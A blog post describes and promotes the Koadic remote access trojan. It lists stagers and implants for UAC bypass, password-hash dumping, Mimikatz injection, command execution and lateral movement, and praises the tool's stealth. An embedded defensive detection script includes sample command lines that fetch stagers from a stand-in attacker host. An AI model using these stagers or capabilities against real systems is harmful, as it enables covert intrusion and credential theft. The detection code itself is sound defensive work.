All of us know that after exploitation we need some mechanism to maintain access on the target. One of the most common methods is installing a trojan. I have tried to maintain a list of similar tools on the malware sources page on this blog. Now there is a new entrant that raises the bar: Koadic. It is open source and, just as importantly, difficult to detect with common methods.
What is Koadic?
Koadic is an open source post-exploitation RAT (remote access trojan) that uses the Windows Script Host, via the COM interface, for most of its operations. You are probably aware of, or already using, other techniques such as the Metasploit Meterpreter or your favourite PowerShell based framework to carry out the dirty post-exploitation work. Heck, if you are in the NSA/CIA (or another three letter government agency), the chances of you using something better than Danderspritz are higher. But there are problems with the above techniques. Meterpreter shells are detected by almost all good anti-virus products. PowerShell leaves a large audit trail in the event logs that anyone can read with the Windows Event Viewer. The only options left are to use the bigger Danderspritz cousin or to create something of your own. If you can do that, good for you. If not, use Koadic. Why? Since it uses VBScript/JScript, you can expect it to work on all Microsoft Windows operating systems from Windows 2000 onwards, because the script host is built in. Not only that, you have the option of running payloads completely in memory or from disk. Also, depending on which OS Koadic gets installed onto, cryptographically secure communications over SSL and TLS are possible as well.
In the advanced Microsoft Windows RAT terminology, the systems you control are called zombies. Then there are stagers, which hook target zombies and allow you to use implants. Implants start jobs on zombies.
Current Koadic Stagers:
stager/js/mshta: serves payloads in memory using MSHTA.exe HTML Applications
stager/js/regsvr: serves payloads in memory using regsvr32.exe COM+ scriptlets
stager/js/rundll32_js: serves payloads in memory using rundll32.exe
stager/js/disk: serves payloads using files on disk
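As an added illustration from the defender's side (this is not code from the Koadic project), each of the three in-memory stager hosts listed above leaves a distinctive process-creation footprint. The Python below runs a small rule set over constructed Sysmon-style events (the attacker.example host, user and file paths are made up) and flags the mshta.exe, regsvr32.exe scriptlet and rundll32.exe script invocations, while letting an ordinary regsvr32 DLL registration through.

```python
import re
from os.path import basename

# Constructed sample process-creation events (not real telemetry), flattened
# from a Sysmon Event ID 1 style record: image path, parent image, command line.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "mshta.exe http://attacker.example/stager"},
    {"image": r"C:\Windows\System32\regsvr32.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "regsvr32.exe /s /n /u /i:http://attacker.example/x.sct scrobj.dll"},
    {"image": r"C:\Windows\System32\rundll32.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": 'rundll32.exe javascript:"<constructed, elided>"'},
    {"image": r"C:\Windows\System32\regsvr32.exe",   # benign DLL registration
     "parent": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"regsvr32.exe /s C:\Program Files\Vendor\vendor.dll"},
    {"image": r"C:\Windows\System32\mshta.exe",      # local HTA: lower confidence
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"mshta.exe C:\Users\alice\AppData\Local\tool\setup.hta"},
]

# One rule per stager host binary: the image name plus a command-line pattern
# that benign use of the same binary rarely shows (remote URL, scriptlet
# runtime, or a script: protocol handler).
RULES = [
    ("mshta_remote_hta",    "mshta.exe",    re.compile(r"\b(https?|ftp)://", re.I), "high"),
    ("regsvr32_scriptlet",  "regsvr32.exe", re.compile(r"/i:\S*https?://|scrobj\.dll", re.I), "high"),
    ("rundll32_javascript", "rundll32.exe", re.compile(r"\bjavascript:", re.I), "high"),
    ("mshta_local_hta",     "mshta.exe",    re.compile(r"\.hta\b", re.I), "low"),
]

def classify(event):
    """Return the (rule name, severity) pairs that match one process-creation event."""
    image = basename(event["image"].replace("\\", "/")).lower()
    return [(name, severity) for name, binary, pattern, severity in RULES
            if image == binary and pattern.search(event["cmdline"])]

def detect(events):
    """Run every rule over a list of events; return alerts, highest severity first."""
    alerts = []
    for event in events:
        for name, severity in classify(event):
            alerts.append({"rule": name, "severity": severity,
                           "parent": basename(event["parent"].replace("\\", "/")),
                           "cmdline": event["cmdline"]})
    return sorted(alerts, key=lambda a: {"high": 0, "low": 1}[a["severity"]])

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f'{a["severity"]:<5} {a["rule"]:<20} parent={a["parent"]} :: {a["cmdline"]}')
```

The parent image is carried into each alert because a script host spawned by an Office application or another script host is far more suspicious than the same command line launched by an installer.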
Current Koadic Implants:
implant/elevate/bypassuac_eventvwr: Uses enigma0x3’s eventvwr.exe exploit to bypass UAC on Windows 7, 8, and 10.
implant/elevate/bypassuac_sdclt: Uses enigma0x3’s sdclt.exe exploit to bypass UAC on Windows 10.
implant/fun/zombie: Maxes volume and opens The Cranberries YouTube in a hidden window.
implant/fun/thunderstruck: Maxes volume and opens the AC/DC Thunderstruck YouTube video in a hidden window.
implant/fun/voice: Plays a message over text-to-speech.
implant/gather/enum_shares: Retrieves the currently shared directories.
implant/gather/enum_users: Retrieves a user list.
implant/gather/clipboard: Retrieves the current content of the user clipboard.
implant/gather/hashdump_sam: Retrieves hashed passwords from the SAM hive.
implant/gather/hashdump_dc: Retrieves domain controller hashes from the NTDS.dit file.
implant/inject/mimikatz_dynwrapx: Injects a reflectively loaded DLL to run powerkatz.dll (using Dynamic Wrapper X).
implant/inject/mimikatz_dotnet2js: Injects a reflectively loaded DLL to run powerkatz.dll (@tirannido DotNetToJS).
implant/inject/shellcode_excel: Runs arbitrary shellcode payload (if Excel is installed).
implant/manage/enable_rdesktop: Enables remote desktop on the target.
implant/manage/exec_cmd: Run an arbitrary command on the target, and optionally receive the output.
implant/pivot/stage_wmi: Hook a zombie on another machine using WMI.
implant/pivot/exec_psexec: Run a command on another machine using PsExec from Sysinternals.
implant/scan/tcp: Uses HTTP to scan open TCP ports on the target zombie LAN.
implant/utils/download_file: Downloads a file from the target zombie.
implant/utils/upload_file: Uploads a file from the listening server to the target zombie.
So you see there is a lot you can do with Koadic, and without raising much noise.
The “administration” panel of this advanced Windows JScript/VBScript RAT is written in Python, so you need to check out its Git repository from this link.